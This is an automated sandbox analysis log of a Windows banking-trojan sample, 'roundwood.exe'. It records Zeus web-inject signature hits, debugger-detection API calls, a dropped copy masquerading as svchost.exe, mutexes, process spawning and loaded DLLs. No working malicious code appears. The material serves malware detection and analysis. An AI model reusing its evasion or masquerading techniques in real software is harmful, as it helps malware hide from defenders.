Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4460, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 2212, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 2180, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4444, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04

Source: roundwood.exe	Static PE information: Section: .data ZLIB complexity 0.9971580276946108
Source: svchost.exe.0.dr	Static PE information: Section: .data ZLIB complexity 0.9971580276946108

Source: classification engine

Classification label: mal100.bank.troj.spyw.expl.evad.winEXE@130/42@1708/26

Source: C:\Users\user\Desktop\roundwood.exe

Code function: 0_2_00401000 IsDebuggerPresent,FindWindowA,memset,CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,StrStrIA,Process32Next,GetHandleInformation,FindCloseChangeNotification,PathFileExistsA,

0_2_00401000

Source: C:\Users\user\Desktop\roundwood.exe

Code function: 0_2_00402660 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,

0_2_00402660

Source: C:\Windows\apppatch\svchost.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\login[1].htm

Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\A3B7F9B4a
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:8164:64:WilError_03
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6980
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:6756:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:356:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:1860:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4672
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4268
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6300

Source: C:\Users\user\Desktop\roundwood.exe

File created: C:\Users\user\AppData\Local\Temp\3A31.tmp

Jump to behavior

Source: C:\Users\user\Desktop\roundwood.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: roundwood.exe

ReversingLabs: Detection: 89%

Source: roundwood.exe	String found in binary or memory: -help
Source: svchost.exe	String found in binary or memory: -help

Source: C:\Users\user\Desktop\roundwood.exe

File read: C:\Users\user\Desktop\roundwood.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\roundwood.exe "C:\Users\user\Desktop\roundwood.exe"
Source: C:\Users\user\Desktop\roundwood.exe	Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4268 -ip 4268
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 984
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4672 -ip 4672
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 708
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6980 -ip 6980
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 976
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6300 -ip 6300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 744
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6648 -ip 6648
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5168 -ip 5168
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5616 -ip 5616
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2672 -ip 2672
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3436 -ip 3436
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4764 -ip 4764
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3656 -ip 3656
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4460 -ip 4460
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2180 -ip 2180
Source: C:\Users\user\Desktop\roundwood.exe	Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4268 -ip 4268	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 984	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4672 -ip 4672	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 708	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6980 -ip 6980	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 976	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6300 -ip 6300	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 744	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6648 -ip 6648	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5168 -ip 5168	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5616 -ip 5616	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2672 -ip 2672	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4764 -ip 4764	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3656 -ip 3656	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4460 -ip 4460	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6648 -ip 6648	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2180 -ip 2180	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Section loaded: netutils.dll	Jump to behavior
